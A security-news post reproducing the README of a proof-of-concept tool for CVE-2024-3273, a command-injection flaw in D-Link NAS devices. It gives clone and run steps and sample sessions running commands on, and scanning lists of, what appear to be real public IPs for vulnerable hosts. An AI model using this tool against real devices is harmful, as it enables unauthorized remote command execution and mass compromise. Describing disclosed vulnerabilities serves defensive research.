Cyber security

CVE-2024-3273 Proof Of Concept (PoC) : Unveiling The Vulnerability In D-Link NAS Devices

This repository contains a Proof of Concept (PoC) for CVE-2024-3273, a security vulnerability discovered in D-Link NAS devices.

The vulnerability allows attackers to execute arbitrary commands on vulnerable devices.

CVE-2024-3273 is a vulnerability in D-Link NAS devices that allows remote attackers to execute arbitrary commands via a crafted HTTP request to the cgi-bin/nas_sharing.cgi endpoint.

This PoC demonstrates how the vulnerability can be exploited to execute commands on vulnerable D-Link NAS devices.

Requirements

  • Python 3.x
  • requests library

Usage

  1. Clone this repository:
git clone https://github.com/adhikara13/CVE-2024-3273.git

2. Navigate to the repository directory:

cd CVE-2024-3273

3. Run the PoC:

python main.py

4. Follow the on-screen instructions to choose the target device:

  • Option 1: Single Host (1): Enter details for a single target device, including the host IP address and command to run.
  • Option 2: Multiple Hosts (2): Provide a file containing multiple target devices in the format host:port, and choose whether to export vulnerable hosts to vulnerables.txt.

    Example

    ┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
    ┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
    ┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛
    
    Choose an option (1: Single Host, 2: Multiple Hosts): 1
    Enter the host: 114.32.179.200
    Enter the command to run: ls
    Response from 114.32.179.200:
    box.cgi
    codepage_mgr.cgi
    download_mgr.cgi
    dropbox.cgi
    folder_tree.cgi
    
    ┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
    ┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
    ┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛
    
    Choose an option (1: Single Host, 2: Multiple Hosts): 2
    Enter the file path containing hosts: list.txt
    Export vulnerable host to vulnerables.txt? (y/n): y
    Connection error for host 87.205.188.21:9290.
    Connection error for host 186.212.112.141:8081.
    Host 124.120.263.149:8032 is vulnerable.

    Varshini

    Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.

    Recent Posts

    SpyAI : Intelligent Malware With Advanced Capabilities

    SpyAI is a sophisticated form of malware that leverages advanced technologies to capture and analyze…

    2 days ago

    Proxmark3 : The Ultimate Tool For RFID Security And Analysis

    The Proxmark3 is a versatile, open-source tool designed for radio-frequency identification (RFID) security analysis, research,…

    2 days ago

    Awesome Solana Security : Enhancing Program Development

    The "Awesome Solana Security" collection is a comprehensive resource designed to help developers build more…

    2 days ago

    IngressNightmare-POCs : Understanding The Vulnerability Exploitation Flow

    The "IngressNightmare" vulnerabilities, disclosed in March 2025, represent a critical set of security issues affecting…

    2 days ago

    AdaptixC2 : Enhancing Penetration Testing With Advanced Framework Capabilities

    AdaptixC2 is an advanced post-exploitation and adversarial emulation framework designed specifically for penetration testers. It…

    2 days ago

    Bincrypter : Enhancing Linux Binary Security through Runtime Encryption And Obfuscation

    Bincrypter is a powerful Linux binary runtime crypter written in BASH. It is designed to…

    2 days ago